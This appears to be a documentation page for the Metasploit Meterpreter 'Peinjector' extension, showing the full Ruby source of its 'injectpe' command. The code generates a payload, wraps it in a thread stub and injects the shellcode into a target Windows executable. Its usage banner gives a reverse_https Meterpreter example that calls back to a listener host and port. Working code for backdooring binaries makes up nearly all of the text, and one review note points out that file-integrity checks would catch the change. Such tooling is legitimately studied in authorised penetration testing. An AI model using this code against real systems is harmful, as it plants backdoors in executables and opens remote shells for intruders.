Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Peinjector

Inherits:
Object
  • Object
Includes:
Rex::Post::Meterpreter::Ui::Console::CommandDispatcher
Defined in:
lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb

Overview

Peinjector extension - inject a given shellcode into an executable file

Constant Summary collapse

# Shorthand reference to this dispatcher class.
Klass =
Console::CommandDispatcher::Peinjector
# Option table for the `injectpe` command. Each flag maps to a pair of
# [takes_an_argument, help text]; '-h' is the only flag without a value.
@@injectpe_opts =
Rex::Parser::Arguments.new(
  '-p' => [true, 'Windows Payload to inject into the target executable.'],
  '-t' => [true, 'Path of the target executable to be injected'],
  '-o' => [true, 'Comma separated list of additional options for payload if needed in \'opt1=val,opt2=val\' format.'],
  '-h' => [false, 'Help banner']
)

Instance Attribute Summary

Attributes included from Ui::Text::DispatcherShell::CommandDispatcher

#shell, #tab_complete_items

Instance Method Summary collapse

Methods included from Rex::Post::Meterpreter::Ui::Console::CommandDispatcher

check_hash, #client, #docs_dir, #filter_commands, #initialize, #log_error, #msf_loaded?, #session, set_hash, #unknown_command

Methods included from Msf::Ui::Console::CommandDispatcher::Session

#cmd_background, #cmd_background_help, #cmd_exit, #cmd_irb, #cmd_irb_help, #cmd_irb_tabs, #cmd_pry, #cmd_pry_help, #cmd_resource, #cmd_resource_help, #cmd_resource_tabs, #cmd_sessions, #cmd_sessions_help

Methods included from Ui::Text::DispatcherShell::CommandDispatcher

#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #docs_dir, #help_to_s, included, #initialize, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_directory, #tab_complete_filenames, #tab_complete_generic, #tab_complete_source_address, #unknown_command, #update_prompt

Instance Method Details

#cmd_injectpe(*args) ⇒ Object

Inject a given shellcode into a remote executable



# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 54

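# Console handler for the `injectpe` command: parses the flags, builds the
# payload via #create_payload and hands it to #inject_payload.
#
# @param args [Array<String>] raw tokens typed after the command name
# @return [false] when help was requested or a required option is missing;
#   otherwise whatever #inject_payload returns
def cmd_injectpe(*args)
  if args.empty? || args.include?('-h')
    injectpe_usage
    return false
  end

  opts = {
    payload: nil,
    targetpe: nil,
    options: nil
  }

  @@injectpe_opts.parse(args) do |opt, _idx, val|
    case opt
    when '-p'
      opts[:payload] = val
    when '-t'
      opts[:targetpe] = val
    when '-o'
      opts[:options] = val
    end
  end

  # Both -p and -t feed the calls below; stop here with a clear message
  # instead of passing nil on to #create_payload / #inject_payload.
  if opts[:payload].to_s.empty? || opts[:targetpe].to_s.empty?
    print_error('Both a payload (-p) and a target executable (-t) are required.')
    injectpe_usage
    return false
  end

  payload = create_payload(opts[:payload], opts[:options])

  inject_payload(payload, opts[:targetpe])
end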

#commands ⇒ Object

List of supported commands.



# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 30

# Commands this dispatcher contributes to the console.
#
# @return [Hash{String => String}] command name mapped to its one-line help text
def commands
  supported = {}
  supported['injectpe'] = 'Inject a shellcode into a given executable'
  supported
end

#create_payload(name, opts = "") ⇒ Object

Create a payload given a name and a comma-separated string of additional options (for example lhost and lport)



# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 82

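# Create the named payload instance, apply the fixed settings used by this
# extension and copy any extra 'key=value' options into its datastore.
#
# @param name [String] payload name handed to the framework payload set
# @param opts [String, nil] comma separated 'opt1=val,opt2=val' pairs; blank
#   or nil means no extra options
# @return [Object] the configured payload instance
# @raise [ArgumentError] if the framework returns no payload for +name+
def create_payload(name, opts = "")
  pay = client.framework.payloads.create(name)
  # Fail with a readable message rather than a NoMethodError on nil below.
  raise ArgumentError, "Invalid payload: #{name}" if pay.nil?

  pay.datastore['EXITFUNC'] = 'thread'
  # this is to generate a proper uuid and make the payload to work with the universal handler
  pay.available_space = 1.gigabyte

  unless opts.blank?
    opts.split(',').each do |pair|
      # Trim whitespace so 'a=1, b=2' does not yield a datastore key ' b'.
      key, val = pair.split('=', 2).map(&:strip)
      next if key.nil? || key.empty?

      pay.datastore[key] = val
    end
  end

  # Validate the options for the module
  pay.options.validate(pay.datastore)
  pay
end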

#inject_payload(pay, targetpe) ⇒ Object



# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 100

# Generate the payload, wrap it with the extension's add_thread_x64 or
# add_thread_x86 helper depending on the payload architecture, and pass the
# result to the extension's inject_shellcode call for +targetpe+.
#
# NOTE(review): a successful run changes the contents of the target
# executable, so hash baselines or integrity monitoring for that path should
# flag it. Confirm how the extension writes the file.
#
# @param pay [Object] payload instance responding to #generate, #arch and #name
# @param targetpe [String] path of the executable, as given with -t
# @return [Object] result of the final print_good / print_error call
def inject_payload(pay, targetpe)
  print_status("Generating payload")
  raw = pay.generate

  isx64 = pay.arch.join == ARCH_X64
  threaded_shellcode =
    if isx64
      client.peinjector.add_thread_x64(raw)
    else
      client.peinjector.add_thread_x86(raw)
    end

  param = {
    isx64: isx64,
    shellcode: threaded_shellcode,
    targetpe: targetpe,
    size: threaded_shellcode.length
  }

  print_status("Injecting #{pay.name} into the executable #{targetpe}")
  client.peinjector.inject_shellcode(param)
  print_good("Successfully injected payload into the executable: #{targetpe}")
# NOTE(review): ::Exception also covers non-StandardError exceptions such as
# Interrupt; kept exactly as the original wrote it.
rescue ::Exception => e
  print_error("Failed to Inject Payload to executable #{targetpe}!")
  print_error(e.to_s)
end

#injectpe_usage ⇒ Object



# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 44

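# Print the usage banner for `injectpe` followed by the option table.
#
# The example matches the 'opt1=val,opt2=val' format that the -o help text
# describes: no comma between flags and no space inside the option list.
#
# @return [Object] result of the last print_line call
def injectpe_usage
  print_line('Usage: injectpe -p < windows/meterpreter/reverse_https > -t < c:\target_file.exe > -o < lhost=192.168.1.123,lport=4443 >')
  print_line
  print_line('Inject a shellcode on the target executable.')
  print_line(@@injectpe_opts.usage)
end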

#name ⇒ Object

Name for this dispatcher



# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 23

# Display name of this dispatcher.
#
# @return [String] always the literal 'Peinjector'
def name
  dispatcher_name = "Peinjector"
  dispatcher_name
end